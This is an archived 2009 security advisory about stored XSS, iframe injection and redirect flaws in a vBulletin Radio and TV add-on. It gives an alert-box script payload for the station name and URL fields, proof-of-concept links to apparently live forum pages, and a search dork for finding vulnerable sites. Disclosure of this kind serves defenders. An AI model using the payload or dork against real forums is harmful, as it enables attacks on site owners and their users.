vBulletin Radio And TV Player Cross Site Scripting

2009-06-15T00:00:00
ID PACKETSTORM:78410
Type packetstorm
Reporter d3v1l
Modified 2009-06-15T00:00:00

Description

                                        
                                            `vBulletin Radio and TV Player Add-On (all version) - XSS , Iframe injection and Redirect Vulnerability   
  
About:-   
  
Radio and TV Add-on will add a radio and TV library to your forum.  
  
Features:-   
  
- Users can add / delete / edit own stations  
  
For more info about this plugin See - http://www.vbulletin.org/forum/showthread.php?t=152037&page=2   
  
Note:-   
  
- To exploit this Bug need to be registred!and after you are registered you can add new radio station  
where name station can be "><script>alert(String.fromCharCode(88,83,83))</script>   
and URL "><script>alert(String.fromCharCode(88,83,83))</script>  
  
  
Poc: XSS   
  
http://www.musicadigitale.net/forum/radioandtv.php?station=92   
  
Poc: Iframe   
  
http://www.musicadigitale.net/forum/radioandtv.php?station=93   
  
Poc: Redirect   
  
http://www.musicadigitale.net/forum/radioandtv.php?station=94  
  
dorks:- inurl:radioandtv.php   
  
Bug founded by d3v1l [Avram Marius]   
  
Date: 14.06.2009   
  
https://security-shell.ws/forum.php   
http://security-sh3ll.blogspot.com   
  
`